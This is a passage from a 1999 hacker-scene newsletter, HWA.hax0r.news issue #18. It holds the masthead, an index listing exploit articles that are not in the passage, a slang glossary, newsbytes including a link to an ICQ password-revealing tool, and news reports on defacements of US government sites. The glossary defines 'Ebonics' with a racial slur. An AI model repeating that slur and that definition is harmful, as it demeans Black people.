HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 18 Volume 1 1999 May 15th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== Linus on life... Torvalds said, "To explain human motivation, I've come up with Linus' Law, which states the three motives that drive us: survival, social life, and entertainment." He claimed that human history moves through each motive in cycles. "Think of sex," he said. "First, it was used for procreation to survive. Then it became a social bonding tool. And now it's at its apex, as entertainment. Right now, I believe we're moving into an entertainment society." He added that Rome had also been an entertainment society just before its powerful empire began to implode. And that was when things began to go wrong -- at least, ethically speaking. Much to his theoretical colleagues' chagrin, Torvalds revealed that he isn't interested in human welfare, seeing as we're all doomed anyway. He'd much rather have fun than think about all that stuff. While the panelists and audience listened in dismay, Torvalds asserted that LINUX was good largely because it was entertaining, and that he didn't worry much about poor people because the world is unfair and that's just how it is. - NewsTrolls Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #18 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #18 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Mitnick Hearing.................................................. 04.0 .. U.S Embassy and DOE sites cracked................................ 05.0 .. "The Egg" `Cracked'.............................................. 06.0 .. Student changes grades........................................... 07.0 .. IBM's Gift To Australia's Security............................... 08.0 .. SCREAM busted.................................................... 09.0 .. Corel Hacked..................................................... 10.0 .. G0at Security calls it quits..................................... 11.0 .. Guninski uncovers yet another browser bug........................ 12.0 .. Freaky to do a Macintosh related speech at Defcon7 .............. 13.0 .. IIS 2.0 "Security" by p0lix...................................... 14.0 .. l0pht Security Advisory on MS IIS 4.0............................ 15.0 .. X-Force Security advisory on Oracle 8: Multiple file system vulnerabilties 16.0 .. Microsoft Security Bulletin : File viewers vulnerability (MS99-13) 17.0 .. iParty pooper.................................................... 18.0 .. Microsoft Security Bulletin: Excel 97 virus patch (MS99-14)...... 19.0 .. LISA install leaves root access OpenLinux 2.2 ................... 20.0 .. BUGTRAQ list receives a plaque at SANS........................... 21.0 .. White House takes server offline after hack ..................... 22.0 .. Feds to install IDS.............................................. 23.0 .. CIH damages climb in China....................................... 24.0 .. Company claims damages from web defacement....................... 25.0 .. .gov sites hacked in protest of embassy bombing.................. 26.0 .. Full Disclosure, the only way to go.............................. 27.0 .. NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter.. 28.0 .. Cure for CIH..................................................... 29.0 .. Anonymous surfing from 303.org................................... 30.0 .. Yugoslavia offline............................................... 31.0 .. Spam Recycling site deals with spammers for you.................. 32.0 .. quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner... 33.0 .. sdtcm_convert local root overflow exploit for Sparc.............. 34.0 .. lpset local root overflow exploit for solaris x86................ 35.0 .. admintool local root exploit for solaris x86 machines............ 36.0 .. dtprintinfo buffer overflow for solaris x86...................... 37.0 .. Are we running out of IP numbers? how many class c's are left??.. 27.1 .. And is webspace infinite?........................................ 38.0 ,, Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet... 39.0 .. IBM breaks more records with denser hard disk storage............ 40.0 .. Carmack offers a bounty on Quake server DoS's and bug reports.... 41.0 .. Hack into a webserver and win $10,000 ........................... 42.0 .. SSHD vulnerability found by JJF Hackers Team..................... 43.0 .. Neil Stephenson author of "Snow Crash" releases new book......... 44.0 .. Novell Netware 4.0 advisory by Nomad Mobile Research Center...... 45.0 .. Penalties for Pirates may increase............................... 46.0 .. British Spy's site shutdown on Geocities?........................ 47.0 .. The Virus Hype, Fact or Fiction by Thejian....................... 48.0 .. The Internet Fraud Council....................................... 49.0 .. Credit Card fraud under watchful eyes of eFalcon 'electronic brain' 50.0 .. [ISN] A ban on unauthorized computer access in Japan to be enacted 51.0 .. Virtual Vault Vulnerable......................................... 52.0 .. PoC GalaDRiel Corel virus resurfaces............................. 53.0 .. Web attacks a 'nuisance' says DoD................................ 54.0 .. GPS's have a Y2K problem early................................... 55.0 .. Retinal scans?................................................... 56.0 .. FreeBSD high speed SYNflood patch................................ =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security and the #innerpulse, crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ ICQ99 network password puller Approved-By: aleph1@UNDERGROUND.ORG Date: Mon, 10 May 1999 09:29:01 -0400 From: Dmitri Alperovitch Subject: ICQ Password Revealer To: BUGTRAQ@netspace.org Hi. A few weeks ago, it was posted that ICQ99 stores the password used to access the ICQ network in plain-text in the .DAT files. We have written a program that demonstrates this by parsing these .DAT files for password and showing it to the user. It can be downloaded at http://www.encrsoft.com/products.html#icqpass Note: The option to save password can be turned off in ICQ's Security & Privacy settings. Yours truly, Dmitri Alperovitch Encryption Software - Developers of TSM for ICQ, an ICQ encryption add-on http://www.encrsoft.com dmitri@encrsoft.com ++ Friday May 14th From HNN http://www.hackernews.com/ Zyklon Busted contributed by Zyklon HNN has received a report that a grand jury has indicted Zyklon. The reports indicate that he has been indicted on various computer related crimes and that he will be officially charged on May 24th. It is unknown at this time exactly what the charges will be or what crimes have supposedly been committed ++ Japan Enacts Cracking Ban From HNN http://www.hackernews.com/ contributed by Hisir0 A Japanese bill sponsored by the National Police Agency, the Ministry of Posts and Telecommunications, and the Ministry of International Trade and Industry (MITI) has been submitted to the Diet after it was adopted at a Cabinet meeting on April 16. It is expected to pass the Diet by the end of June. This bill will outlaw unauthorized access to computer systems in Japan and will carry penalties of fines and imprisonment. Asia BizTech http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/70042 ++ PRIVACY ISSUES From http://www.net-security.org/ by BHZ, Thursday 13th May 1999 on 3:38 pm CET Do Web sites tell their visitors whether they collect personal data and how they use it? In a separate sampling of 364 randomly selected sites, 65.7 percent gave privacy notices (much better then last year when only 14% of sites gave those kind of notices). Read about the study on ZdNet. http://www.zdnet.com/zdnn/stories/news/0,4586,2258012,00.html?chkpt=hpqs014 ++ Don't delete Microsoft files ! From www.403-security.org Astral 11.05.1999 12:20 Office 2000, would be well advised to avoid trying to reduce the size of its massive footprint by deleting files to recover space. Even the most innocuous little text files seem to have some strange and arcane purpose in Bill’s Great Scheme Of Things.For example deleting file DELME.txt is going cause starting install procedure every time Office files are executed. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ No mail for sharing this week! ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Issue #18 'w00ten' * * * * * * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 Mitnick Hearing ~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ May 10th Mitnick Hearing Scheduled for Tomorrow contributed by punkis The recent release of letters claiming outrages damages from companies allegedly targeted by Kevin Mitnick have not pleased the prosecution. The prosecution has filed a motion to have the defense held in contempt for releasing the information. A hearing scheduled for tomorrow originally scheduled to determine Kevin's future earnings potential may also address this motion. The hearing is tomorrow (Tuesday) at 10:00 at: U.S. Central District of California Western Division - Spring Street Court House, 312 N. Spring Street, Los Angeles, CA 90012. If you are in the area stop in and show Kevin some support. It should be some exciting drama. May 11th This hearing was cancelled, no news on when it is to be rescheduled. @HWA 04.0 U.S Embassy and DOE sites cracked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ US Embassy and DOE web sites Cracked From HNN http://www.hackernews.com/ contributed by cult hero In response to the recent NATO bombing of the Chinese embassy in Belgrade some people have started attacking web sites. The US Embassy in China, The DOE, and the Department of Interior are a few of the web sites that have had their web pages changed as a direct result of the bombings. Most of the slogans posted on the pages are extremely anti USA and NATO and and evoke Chinese nationalism and patriotism. ABC News http://www.abcnews.go.com/go/sections/world/DailyNews/kosovo_chinacyber_990509.html Protests Reach Cyberspace By Stacy Lu -- ABCNEWS.com May 9, 7:51am PT — Protests over NATO’s bombing of the Chinese embassy in Belgrade have spilled into cyberspace. Enraged hackers apparently attacked the official Web site of the U.S. embassy in China yesterday, took over the Web sites of the Departments of Energy and the Interior today, and established their own online convention center at a site called “killusa.” As a result, the Department of Interior Web site on Sunday displayed pictures of the Chinese journalists killed on Saturday after NATO accidentally bombed the Chinese embassy in Belgrade. The Department of Energy site read “Protest USA’s Nazi action.” It was unclear whether the hacking was done by Chinese or not, though several messages on Chinese Web sites and message boards based in China claimed that it was. According to Chinese news reports, hackers also launched attacks on the official White House site, which features an automated restoration function set to operate within five seconds of an attack. The messages posted on attacked sites were vitriolic, patriotic and, in some cases, poetic. One read “Down with the Yanks. The fate of the Chinese people has reached the most critical point” — a play upon the lyrics of the Chinese national anthem, reflecting a similar patriotic call after the Japanese invaded China in 1937. A poem was posted that has appeared before other civilian unrests in China such, particularly in 1976 after the death of Premier Zhou Enlai. A rough translation: “I grieve while the wolves howl/I cry while the beasts cheer/I shower the martyrs with my tears while unsheathing the sword.” Communist slogans also appeared, a rarity in today’s China. One of the hacked sites declared “This hill has been taken over by the commies.” Message Boards Overflowing Bulletin boards based in China were full of messages condemning the U.S. and NATO’s mistaken bombing of the Chinese embassy. “You think you have a strong army without human nature and a great number of brazen politicians just like you ... pose as the world cop and think the world must run under your rules, your human rights, your democracy," one message read. The Department of Energy’s home page also had a message that read, “We are Chinese hackers that takes no cares about politics, but we can not stand by seeing our Chinese reporters been killed.” The hackers’ own site at killusa.abc.yesite.com, a repository of hacking strategies, had nearly 1,000 messages Sunday, either reporting sites being hacked or expressing anti-American sentiments. Rumors flew thick and fast, among them that NATO had again bombed the Chinese embassy in Belgrade and that Chinese President Jiang Zemin had said that China must be prepared to go to war. Another stated that the intelligence reports provided to NATO prior to the embassy bombing were supplied by a NATO officer angry with China over its treatment of Tibet. A contributor to the page also suggests manning a full-scale attack on American Web sites, disseminating computer viruses, and attacking the sites continuously in a method the hackers term “machine-gunning.” Another suggests targeting financial sites. Copyright 1999 ABC News Internet Ventures -=- Washington Post; [Moderator: Mirrors of these hacks can all be found at http://www.attrition.org/mirror/attrition] http://www.washingtonpost.com/wp-srv/inatl/longterm/balkans/stories/hackers051299.htm Anti-NATO Hackers Sabotage 3 Web Sites By Stephen Barr Washington Post Staff Writer Wednesday, May 12, 1999; Page A25 Computer hackers protesting NATO's bombing of the Chinese Embassy in Belgrade sabotaged three U.S. government Web sites, Clinton administration officials said yesterday. The hackers placed anti-NATO messages on Web pages operated by the Energy Department, the Interior Department and one Interior bureau, the National Park Service. The cyber-attacks late Sunday forced the Energy Department and the Park Service to shut down their home pages for much of Monday. The Interior Department hacker "was traced back to China by DOI computer experts," said Interior spokesman Tim Ahearn. "The FBI is looking into it now." Energy spokeswoman Michelle Del Valle said, "We don't know who did it," but she noted that "the hackers claimed in a message that they were Chinese." She said the DOE has started an investigation. The officials said the Web pages were pulled off line quickly after the sabotage was discovered. Electronic firewalls protected other parts of the departmental computer systems from attack, they said. Del Valle said hackers placed the following message, with 